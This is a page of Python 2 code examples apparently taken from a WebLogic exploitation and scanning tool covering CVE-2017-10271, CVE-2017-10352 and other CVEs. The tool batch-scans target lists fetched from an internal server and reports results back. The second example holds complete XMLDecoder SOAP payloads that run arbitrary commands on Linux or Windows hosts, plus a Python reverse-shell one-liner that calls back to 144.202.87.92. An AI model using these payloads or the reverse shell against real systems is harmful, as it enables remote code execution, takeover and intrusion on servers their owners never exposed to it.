コード例 #1
0
def test():
    urllist = utils.get_url_list(
        "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do?vulnerabilityID=030104"
    )
    for i in urllist:
        print i + "--->" + str(cve_2016_3510(i))
コード例 #2
0
def main():
    parser = optparse.OptionParser()
    parser.add_option('-H',
                      dest='tgtHost',
                      type="string",
                      help='specify target host')
    parser.add_option('-p',
                      dest='tgtPort',
                      type='int',
                      help="specify target port")
    parser.add_option(
        '-b',
        action="store_true",
        dest='batch',
        default=False,
        help="do a batch scan obtaining url list from remote server")
    parser.add_option('--time-based',
                      action="store_true",
                      dest='time_base',
                      help="time based",
                      default=False)
    parser.add_option('-c', dest='command', help='command to execute')
    parser.add_option('-f', dest='filepath', help='file to load')
    parser.add_option('-O', dest='os', help='choose OS')
    parser.add_option('--create-file',
                      action="store_true",
                      dest='create_file',
                      help="create file using native java",
                      default=False)
    (options, args) = parser.parse_args()
    tgtHost = options.tgtHost
    tgtPort = options.tgtPort
    batch = options.batch
    time_base = options.time_base
    command = options.command
    filepath = options.filepath
    os = options.os
    create_file = options.create_file
    if batch and time_base and not tgtHost and not tgtPort and not command and not create_file:
        urllist = utils.get_url_list(
            "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do"
        )
        if urllist:
            target_host_port = map(utils.process_url, urllist)
            pool = ThreadPool(50)
            final_results_10271 = pool.map(cve_2017_10271_time_based,
                                           target_host_port)
            pool.close()
            pool.join()
            json_data_10271 = utils.assembly_data(
                "030103", dict(zip(urllist, final_results_10271)))
            print utils.post_data(
                json_data_10271,
                "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do"
            )

    elif batch and tgtHost == None and tgtPort == None and not time_base and not command and not create_file:
        urllist = utils.get_url_list(
            "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do"
        )
        #print urllist
        assert 'https://' not in urllist
        assert 'http://' not in urllist
        assert 'http' not in urllist
        assert 'https' not in urllist

        if urllist:
            target_url_list1 = map(
                lambda url: 'http://' + utils.process_url(url)[0] + ":" + str(
                    utils.process_url(url)[1]) +
                '/wls-wsat/CoordinatorPortType', urllist)
            target_url_list2 = map(
                lambda url: 'http://' + utils.process_url(url)[0] + ":" + str(
                    utils.process_url(url)[1]) +
                '/wls-wsat/CoordinatorPortType11', urllist)
            pool = ThreadPool(50)
            results1_10271 = pool.map(cve_2017_10271, target_url_list1)
            results2_10271 = pool.map(cve_2017_10271, target_url_list2)

            results1_10352 = pool.map(cve_2017_10352, target_url_list1)
            results2_10352 = pool.map(cve_2017_10352, target_url_list2)
            pool.close()
            pool.join()

            final_results_10271 = [
                x or y for x, y in zip(results1_10271, results2_10271)
            ]
            json_data_10271 = utils.assembly_data(
                "030103", dict(zip(urllist, final_results_10271)))

            # if 'http://www.gzzwjw.gov.cn' in dict(zip(urllist, final_results_10271)):
            # print dict(zip(urllist, final_results_10271))['http://www.gzzwjw.gov.cn']

            final_results_10352 = [
                x or y for x, y in zip(results1_10352, results2_10352)
            ]
            json_data_10352 = utils.assembly_data(
                "030111", dict(zip(urllist, final_results_10352)))

            # print json_data_10271
            # print json_data_10352
            print utils.post_data(
                json_data_10271,
                "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do"
            )
            print utils.post_data(
                json_data_10352,
                "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do"
            )

    elif tgtHost and tgtPort and not batch and not time_base and not command and not create_file:
        url1 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType'
        url2 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType11'

        cve_2017_10271(url1)
        cve_2017_10271(url2)
        cve_2017_10352(url1)
        cve_2017_10352(url2)
    elif tgtHost and tgtPort and time_base and not batch and not command and not create_file:
        cve_2017_10271_time_based((tgtHost, tgtPort))

    elif tgtHost and tgtPort and not time_base and not batch and not command and create_file:
        url1 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType'
        url2 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType11'
        send_payload(url1, payload_create_file_10271, sig_10271,
                     "cve_2017_10271")
        send_payload(url2, payload_create_file_10271, sig_10271,
                     "cve_2017_10271")

    elif tgtHost and tgtPort and not time_base and not batch and command and os:
        payload_linux_10271 = '''
	<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
	<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
		<java version="1.8.0_131" class="java.beans.XMLDecoder">
		  <void class="java.lang.ProcessBuilder">
			<array class="java.lang.String" length="3">
			  <void index="0">
				<string>/bin/bash</string>
			  </void>
			  <void index="1">
				<string>-c</string>
			  </void>
			  <void index="2">
				<string>{}</string>
			  </void>
			</array>
		  <void method="start"/>
		  </void>
		</java>
	  </work:WorkContext>
	</soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
'''
        payload_windows_10271 = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
	<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
		<java version="1.8.0_131" class="java.beans.XMLDecoder">
		  <void class="java.lang.ProcessBuilder">
			<array class="java.lang.String" length="3">
			  <void index="0">
				<string>C:\Windows\System32\cmd.exe</string>
			  </void>
			  <void index="1">
				<string>/c</string>
			  </void>
			  <void index="2">
				<string>{}</string>
			  </void>
			</array>
		  <void method="start"/></void>
		</java>
	  </work:WorkContext>
	</soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
'''
        url1 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType'
        url2 = "http://" + tgtHost + ":" + str(
            tgtPort) + '/wls-wsat/CoordinatorPortType11'
        if os == 'linux':
            if command == 'shell':
                command = '''
				python -c 'import  socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("144.202.87.92",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
				'''
        # print payload_linux_10271

            print payload_linux_10271.format(command)
            send_payload(url1, payload_linux_10271.format(command), sig_10271,
                         "cve_2017_10271")
            send_payload(url2, payload_linux_10271.format(command), sig_10271,
                         "cve_2017_10271")
        elif os == 'win':
            print payload_windows_10271.format(command)
            send_payload(url1, payload_windows_10271.format(command),
                         sig_10271, "cve_2017_10271")
            send_payload(url2, payload_windows_10271.format(command),
                         sig_10271, "cve_2017_10271")
    elif not tgtHost and not tgtPort and filepath and not command and not batch and not time_base:
        with open(filepath, 'r') as f:
            u_list = f.readlines()
        for i in u_list:
            url = "http://" + i.strip() + '/wls-wsat/CoordinatorPortType'
            # send_payload(url,payload_linux_10271, sig_10271, "cve_2017_10271")
            cve_2017_10271(url)
            cve_2017_10352(url)
    else:
        parser.print_help()
        exit(0)
コード例 #3
0
def main():
    parser = optparse.OptionParser()
    parser.add_option('-H',
                      dest='tgtHost',
                      type='string',
                      help='specify target host')
    parser.add_option('-p',
                      dest='tgtPort',
                      type='string',
                      help='specify target port')
    parser.add_option('-b',
                      dest='batch',
                      help='run a batch scan',
                      action="store_true",
                      default=False)
    (options, args) = parser.parse_args()
    tgtHost = options.tgtHost
    tgtPort = options.tgtPort
    batch = options.batch
    if batch and tgtHost == None and tgtPort == None:

        # url = "http://192.168.10.216:7101"
        urllist = utils.get_url_list(
            "https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do"
        )
        # print urllist
        if urllist:
            pool = ThreadPool(100)
            results_0638 = pool.map(cve_2016_0638, urllist)
            results_3248 = pool.map(cve_2017_3248, urllist)
            results_3510 = pool.map(cve_2016_3510, urllist)
            results_2628 = pool.map(cve_2018_2628, urllist)
            results_2893 = pool.map(cve_2018_2893, urllist)

            pool.close()
            pool.join()

            json_0638 = utils.assembly_data("030108",
                                            dict(zip(urllist, results_0638)))
            json_3248 = utils.assembly_data("030101",
                                            dict(zip(urllist, results_3248)))
            json_3510 = utils.assembly_data("030106",
                                            dict(zip(urllist, results_3510)))
            json_2628 = utils.assembly_data("030113",
                                            dict(zip(urllist, results_2628)))
            json_2893 = utils.assembly_data("030114"), dict(
                zip(urllist, results_2893))

            print utils.post_data(
                json_3510,
                'https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do'
            )
            print utils.post_data(
                json_0638,
                'https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do'
            )
            print utils.post_data(
                json_3248,
                'https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do'
            )
            print utils.post_data(
                json_2628,
                'https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do'
            )
            print utils.post_data(
                json_2893,
                'https://172.17.1.2:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do'
            )
            #print json_2628

        # cve_2017_3248(url)
        # cve_2016_3510(url)
        # cve_2016_0638(url)
    elif tgtHost and tgtPort and not batch:
        url = 'http://' + tgtHost + ":" + tgtPort
        cve_2016_3510(url)
        cve_2016_0638(url)
        cve_2017_3248(url)
        cve_2018_2628(url)
        cve_2018_2893(url)
    else:
        parser.print_help()
        exit(0)
コード例 #4
0
                        help="specify a ip target")
    parser.add_argument('-b',
                        '--batch',
                        dest="batch",
                        default=False,
                        action="store_true",
                        help="batch scan")
    args = parser.parse_args()
    target = args.target
    batch = args.batch

    if target and not batch:
        check(target)
    elif batch and not target:
        urllist = utils.get_url_list(
            "http://192.168.17.89:8080/RDP/safeTeamUtil/safeTeamUtil!getAllUrls.do"
        )
        if urllist:

            pool = ThreadPool(20)
            results = pool.map(check, urllist)
            # print dict(zip(urllist,results))
            json_data = utils.assembly_data("060102",
                                            dict(zip(urllist, results)))
            r = utils.post_data(
                json_data,
                "http://192.168.17.89:8080/RDP/safeTeamUtil/safeTeamUtil!recordVulnerability.do"
            )
            print "Uploading data to remote server, please wait..."
            # time.sleep(2)
            if r: